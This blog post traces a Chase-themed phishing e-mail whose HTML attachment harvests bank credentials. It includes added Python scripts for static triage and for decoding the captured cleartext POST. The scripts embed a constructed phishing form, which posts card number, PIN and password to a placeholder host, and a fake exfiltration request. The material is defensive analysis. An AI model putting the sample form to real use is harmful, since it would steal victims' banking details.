Okay, so I recently received a phishing e-mail at my home address and wanted to see what happens if you follow it down the rabbit hole. This is always a fun exercise, because you never know what you're going to find or where you'll end up. Many times it leads to a Blackhole exploit kit or a malicious iframe, but this particular phishing e-mail was purely after personal information. A classic phishing example.
So here's the body of the phishing e-mail in all of its glory. Not bad if you think about it, but it still has the telltale signs of a phishing attack (the generic salutation, grammar and formatting errors, etc.). One area I found amusing in this phishing e-mail is the reference to William Sheley. Mr. Sheley actually exists and does work for Chase as an SVP (thank you, LinkedIn). All in all this is a decently produced and researched phishing attempt, except for one thing. They attached an HTML document they want you to download and fill out (because all banks send you attachments like this). Ummm......No. The attachment trick is popular for a reason: the fake form renders straight from the victim's disk, so there is no phishing URL for a mail filter to block and the address bar only shows a local file path.
So okay, let's play the game. I have a virtual machine (VM) set up running Deep Freeze purposely to infect and play with these types of threats. Once you reboot the VM, everything is restored to its original configuration using some sort of black magic. The software works freaking great and I highly recommend it. Keep in mind that it rolls back the disk; it is not an isolation boundary, so the VM still needs to stay off any network you care about while the sample runs.
The first thing I do is forward the phishing e-mail to a Gmail account I created to store phishing e-mails. Some people collect baseball cards; I collect phishing e-mails. Right off the bat Google notices there's some foul play going on and throws me this alert. Whatever you think of Gmail's privacy, they're pretty darn good at catching spam and phishing.
Now for the fun part. Before opening the HTML file on my VM running Deep Freeze, I uploaded it to www.virustotal.com to check whether it already had a malicious reputation, and started an instance of Wireshark to collect all the network traffic. (Anything you upload to VirusTotal is shared with the AV vendors and other researchers, so never submit a sample that still contains a real victim's data.) Once I opened the HTML document I could see what they're trying to do: a simple form for collecting information from unsuspecting victims. With the fake form up and all the inputs filled out, with fake data of course, I could review the packet capture to see where my faithfully entered credentials were being sent. Another interesting note about this form was that it had client-side input validation on the fields. When I tried to enter "Shut Up" in the ATM/Debit or Credit Card Number field it gave me an error that only numbers were allowed. Well, that was helpful. The validation is there for the attacker's benefit, not yours: it makes sure the stolen card numbers arrive in a usable format.
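You can get the same answers without rendering the attachment at all. The script below is an added example, not code from the original post: it statically pulls the form action, the fields the form harvests, the client-side validation rules and any hard-coded URLs (such as the post-submit redirect to the real bank) out of the HTML. The sample HTML it runs on is constructed to resemble the form described above, and the host www.compromised-site.example is a hypothetical placeholder, not a real indicator.

```python
"""Static triage of an HTML phishing attachment (added example, not the post's code).
Parse the file instead of opening it in a browser: report where each form posts,
which fields it harvests, what validation it enforces and which URLs it hard-codes."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample resembling the attachment described in the post.
# "www.compromised-site.example" is a hypothetical placeholder host.
SAMPLE_HTML = """
<html><body>
<form name="chase" method="post"
      action="http://www.compromised-site.example/web/dmUserPlugin/js/complete.php"
      onsubmit="return validate()">
  <input type="text" name="userid">
  <input type="password" name="password">
  <input type="text" name="cardnumber" maxlength="16" pattern="[0-9]+">
  <input type="text" name="atm_pin" maxlength="4">
  <input type="hidden" name="redirect" value="https://www.chase.com/">
  <input type="submit" value="Continue">
</form>
<script>
function validate() {
  var c = document.chase.cardnumber.value;
  if (!/^[0-9]+$/.test(c)) { alert("Only numbers are allowed"); return false; }
  return true;
}
</script>
</body></html>
"""

URL_RE = re.compile(r"https?://[^\s\"'<>)]+")
ALERT_RE = re.compile(r"""alert\(["']([^"']+)["']\)""")
NON_DATA_INPUTS = {"submit", "button", "image", "reset"}


class FormTriage(HTMLParser):
    """Collects <form> actions, the named inputs inside them and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.forms, self.scripts, self._form, self._in_script = [], [], None, False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {"action": a.get("action") or "", "method": (a.get("method") or "get").lower(),
                          "onsubmit": a.get("onsubmit"), "fields": [], "validation": {}}
            self.forms.append(self._form)
        elif tag in ("input", "select", "textarea") and self._form is not None:
            name = a.get("name")
            if name and (a.get("type") or "text").lower() not in NON_DATA_INPUTS:
                self._form["fields"].append(name)
                rules = {k: a[k] for k in ("pattern", "maxlength", "required") if k in a}
                if rules:
                    self._form["validation"][name] = rules
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.scripts.append(data)


def triage(html):
    """Per-form destination, harvested fields, validation rules and a cleartext flag."""
    p = FormTriage()
    p.feed(html)
    p.close()
    forms = []
    for f in p.forms:
        u = urlparse(f["action"])
        forms.append({
            "method": f["method"], "action_host": u.hostname or "", "path": u.path,
            "fields": f["fields"], "validation": f["validation"],
            # A plain-http POST means the harvested data crosses the wire unencrypted.
            "cleartext": u.scheme == "http" and f["method"] == "post",
            "js_validation": f["onsubmit"] is not None,
        })
    return {"forms": forms,
            "urls": sorted(set(URL_RE.findall(html))),                       # every hard-coded URL
            "alerts": [m for s in p.scripts for m in ALERT_RE.findall(s)]}   # validation messages


if __name__ == "__main__":
    r = triage(SAMPLE_HTML)
    for f in r["forms"]:
        print(f"{f['method'].upper()} to {f['action_host']}{f['path']} cleartext={f['cleartext']}")
        print("  harvests:", ", ".join(f["fields"]), "| validation:", f["validation"])
    print("hard-coded URLs:", r["urls"])
    print("validation messages:", r["alerts"])
```

Run it against the real attachment and the collector URL, the list of harvested fields and the "only numbers" message all fall out before the sample ever touches a browser; the only thing static analysis cannot tell you is what the server does after the POST, which is where the capture comes in.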
As soon as I had entered all the data in the appropriate fashion I submitted it like an unsuspecting user and was promptly redirected to the real Chase home page, shown below. This is done to make you think you actually completed something on the real site and to give you a false sense of security.
Now for the funner (is this a word?) part!! Let's see exactly where all my "sensitive" information was being sent. I stopped my Wireshark capture and took a look at where this HTML form was posting to. Looking at the capture, it becomes clear quite quickly what was going on. As soon as you submit the HTML form there's a DNS request for the "A" record of www.SITE-WILL-REMAIN-NAMELESS.com, followed by an HTTP POST to /web/dmUserPlugin/js/complete.php on that host. It turns out that all my very sensitive information was being sent in the clear (plain HTTP, no TLS) to this compromised site; a PHP script dropped into a plugin's js directory is typical of a collector planted on somebody else's legitimate website. Those two packets are also the two indicators worth pulling out of the capture: the hostname for DNS or proxy blocking, and the full URL for reporting the compromised host to its owner.
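Here is what pulling the answer out of the capture looks like once the TCP stream is in front of you. This is an added example, not the post's own code or its real capture: the request bytes are constructed to look like the POST described above, with the same hypothetical placeholder host and fake test values (4111111111111111 is a well-known test card number). The parser recovers the destination and every submitted field, checks that the body was not truncated, and redacts card and PIN data before it goes into a write-up.

```python
"""Decode a cleartext HTTP POST recovered from a packet capture (added example,
not the post's code). Feed it the raw request bytes as Wireshark's "Follow TCP
Stream" shows them; it returns destination, submitted fields and whether the
body was complete, then redacts secrets for the incident write-up."""
import re
from urllib.parse import parse_qsl

# Constructed capture. The host is a hypothetical placeholder and every value is
# fake test data; Content-Length is computed so the sample is self-consistent.
_BODY = (b"userid=shutup&password=not%20real&cardnumber=4111111111111111"
         b"&atm_pin=1234&ssn=000-00-0000")
CAPTURED_POST = (
    b"POST /web/dmUserPlugin/js/complete.php HTTP/1.1\r\n"
    b"Host: www.compromised-site.example\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: " + str(len(_BODY)).encode() + b"\r\n"
    b"Connection: keep-alive\r\n"
    b"\r\n" + _BODY
)

SECRET_FIELDS = ("pin", "pass", "pwd", "ssn", "cvv")


def parse_http_post(raw):
    """Split a raw HTTP/1.x request into destination, headers and decoded form fields."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    declared = int(headers.get("content-length", len(body)))
    fields = {}
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        fields = dict(parse_qsl(body.decode("latin-1"), keep_blank_values=True))
    return {
        "method": method,
        "host": headers.get("host", ""),
        "path": target,
        "fields": fields,
        # If the stream was cut short, the body is shorter than the header claims.
        "length_ok": declared == len(body),
    }


def luhn_ok(digits):
    """Luhn checksum: tells a real card number from an arbitrary run of digits."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def redact(name, value):
    """Mask a PAN to first6/last4 and blank out PINs, passwords and SSNs."""
    if any(s in name.lower() for s in SECRET_FIELDS):
        return "[redacted]"
    digits = re.sub(r"\D", "", value)
    if 13 <= len(digits) <= 19 and luhn_ok(digits):
        return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]
    return value


def summarize(parsed):
    """Indicator to block plus a redacted view of what was exfiltrated."""
    return {
        "indicator": parsed["host"] + parsed["path"],  # readable in the pcap, so it went over plain HTTP
        "exfiltrated": list(parsed["fields"]),
        "fields": {k: redact(k, v) for k, v in parsed["fields"].items()},
        "complete": parsed["length_ok"],
    }


if __name__ == "__main__":
    p = parse_http_post(CAPTURED_POST)
    s = summarize(p)
    print(f"{p['method']} http://{s['indicator']} complete={s['complete']}")
    for k, v in s["fields"].items():
        print(f"  {k} = {v}")
```

The length check matters more than it looks: a capture that stopped mid-stream will still parse, and the fields that were cut off are exactly the ones you would wrongly report as not exfiltrated.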
Now wasn't that fun?! In my next post I'm going to infect my VM with a Blackhole exploit kit and show you some of the nasty things it does.